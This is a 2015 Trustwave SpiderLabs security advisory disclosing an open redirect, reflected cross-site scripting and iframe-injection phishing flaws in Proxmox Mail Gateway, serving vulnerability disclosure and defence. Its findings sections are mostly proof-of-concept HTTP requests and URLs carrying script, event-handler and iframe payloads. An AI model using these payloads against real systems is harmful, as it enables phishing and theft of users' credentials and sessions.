Trustwave SpiderLabs Security Advisory TWSL2015-024:
Multiple Vulnerabilities in Proxmox Mail Gateway

Published: 12/30/2015
Version: 1.0

Vendor: Proxmox Server Solutions GmbH (https://www.proxmox.com/)
Products: Proxmox Mail Gateway
Version affected: prior to hotfix 4.0-8-097d26a9

Product description:
Proxmox Mail Gateway protects email server from Spam, Viruses, Trojans and 
Phishing emails.The web-based management empowers the admin to control all 
functionalities. This includes the unique message tracking center, collecting 
and displaying all available logs in an easy to understand summary - a great
solution for help desk. The Installation Medium (CD or USB) is a complete 
operation system, including everything to install and run the Proxmox Mail 
Gateway in a few minutes. It can be installed on bar-metal but also on almost 
all leading virtualization platforms.

Finding 1: Arbitrary Site Redirection Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs

Input passed via the 'destination' parameter not properly verified before being 
used to redirect users.An attacker can leverage this issue by constructing a 
crafted URI and enticing a user to follow it. When an unsuspecting victim 
follows the link, they may be redirected to an attacker-controlled site; this 
may aid in phishing attacks.

An attacker can exploit this issue by enticing an unsuspecting victim to follow 
a malicious URI.

REQUEST:
========
POST /nrd/LOGIN HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

credential_0=root&credential_1=admin&destination=http://www.example.com


Finding 2: Reflected Cross-site Scripting Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs

Multiple reflected cross-site scripting (XSS) vulnerabilities were discovered in the product.

1. Performing XSS on /users/index.htm

REQUEST:
========
GET /users/index.htm/'onmouseover%3d'prompt("XSS")'bad%3d'> HTTP/1.1
Referer: https://a.b.c.d/
Cookie: ProxmoxAuthCookie=root::root::1423157033::1528f0e31aa5352ed990e3a240e186356e278b6d; EMBPERL_UID=902ea1c4fac106dd826dc1733ef8f7d7
Host: a.b.c.d
Connection: Keep-alive
Accept: */*

2. Performing XSS on /quarantine/spam/manage.htm

https://a.b.c.d/quarantine/spam/manage.htm/%27onmouseover=%22alert%281362%29%22

3. Performing XSS on /quarantine/spam/whitelist.htm

https://a.b.c.d/quarantine/spam/whitelist.htm/%27onmouseover=%22alert%281364%29%22

4. Performing XSS on /queues/mail/index/

https://a.b.c.d/queues/mail/index/%27+alert%281369%29+%27?action=vcdiscard

5. Performing XSS on /system/ssh.htm 

https://a.b.c.d/system/ssh.htm?action=delitem&itype=n%27%2Balert%28938%29%2B%27&aa=10.0.0.0/255.0.0.0

6. Performing XSS on /queues/mail/?domain= by injecting '<script>XSS Payload</script' into parameter domain's value

REQUEST:
========
GET /queues/mail/?domain=<script>alert(1)</script> HTTP/1.1
Cookie: EMBPERL_UID=0667ff0a593b17dbcf0a5dc8838e0b8a; ProxmoxAuthCookie=root::root::1422739689::a19ceda9cbfa7b6285d234588b26eb99ed2eb2ab
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d/queues/mail/
Host: a.b.c.d

Both parameters 'domain's and 'qid's value can be set to '%3E%22%27%3E%3Cscript%3Ealert%2890%29%3C%2Fscript%3E'

7. Performing XSS on /quarantine/virus/manage.htm

REQUEST:
========
POST /quarantine/virus/manage.htm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: EMBPERL_UID=0667ff0a593b17dbcf0a5dc8838e0b8a; ProxmoxAuthCookie=root::root::1422739576::2ad984cb8219860ae1c1c0e5910a45daf273831f
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d/quarantine/virus/manage.htm
Host: a.b.c.d
Content-Length: 125

filter=>"'><script>alert("XSS")</script>&frm_submit=>"'><script>alert("XSS")</script>


Both parameters 'filter's and 'frm_submit's value can be set to '%3E%22%27%3E%3Cscript%3Ealert%28151%29%3C%2Fscript%3E'


Finding 3: Phishing Vector Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs

1. Performing Phishing

It’s possible to set parameter 'domain's value to 
'domain.tld%27%22%3E%3Ciframe+id%3D441+src%3Dhttp%3A%2F%2Fexample.com%2Fphishing
.html%3E' ,it does make possible for an attacker to inject a frame or an iframe 
tag with malicious content. An incautious user may browse it and not realize 
that he is leaving the original site and surfing to a malware infected website. 
The attacker may then lure the user to login again, thus acquiring his login 
credentials, due to the site being embedded in the original site, it might 
additionally help the malicious attacker by giving his phishing attempts a more 
reliable outlook.

This could result in obtaining sensitive information such as username, password, credit card number, social security number etc.

REQUEST:
========
GET /queues/mail/?domain=domain.tld%27%22%3E%3Ciframe+id%3D441+src%3Dhttp%3A%2F%2Fexample.com%2Fsuperphishing.html%3E HTTP/1.1
Cookie: EMBPERL_UID=0667ff0a593b17dbcf0a5dc8838e0b8a; ProxmoxAuthCookie=root::root::1422739689::a19ceda9cbfa7b6285d234588b26eb99ed2eb2ab
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d/queues/mail/
Host: a.b.c.d

2. Performing Phishing

REQUEST:
========
POST /quarantine/virus/manage.htm HTTP/1.1
Host: a.b.c.f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: EMBPERL_UID=658cafe5675e9f94b49492f20a665ac9; ProxmoxAuthCookie=root::root::1423513252::caeb9e659cf72f8b11f6d5f7e5608f58b35c7de0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

filter=12'"><iframe+id=1240+src=http://example.com/phishing.html>&frm_submit=1

RESPONSE
========
    <tr>
    	<td><img alt='' src="/images/blank.gif" border=0 width=1 height=450></td>
        <td valign="top" style="padding:10px;padding-top:20px;"><form style='margin:0px;' method=POST action='/quarantine/virus/manage.htm'><p>Mail address filter: <input class='normal wide' type=text size=50 name=filter value='12'"><iframe+id=1240+src=http://example.com/phishing.html>'>
<input value='Submit' type=submit><input type=hidden name='frm_submit' value='1'></p></form><br><p>No mails found.</p></td>
    </tr>
  </table>
<!-- End:MainArea -->
    </td>
  </tr>


Remediation Steps:
The vendor released hotfix-4-0-8-097d26a9-bin to mitigate these 
vulnerabilities. Please note that Trustwave SpiderLabs have not verified this 
fix.

Revision History:
03/18/2015 - Vulnerability disclosed to vendor
04/02/2015 - Patch released by vendor
12/30/2015 - Advisory published

References
1. https://www.proxmox.com/proxmox-mail-gateway/support


About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security 
risk. With cloud and managed security services, integrated technologies and a 
team of security experts, ethical hackers and researchers, Trustwave enables 
businesses to transform the way they manage their information security and 
compliance programs. More than three million businesses are enrolled in the 
Trustwave TrustKeeper® cloud platform, through which Trustwave delivers 
automated, efficient and cost-effective threat, vulnerability and compliance 
management. Trustwave is headquartered in Chicago, with customers in 96 
countries. For more information about Trustwave, visit 
https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.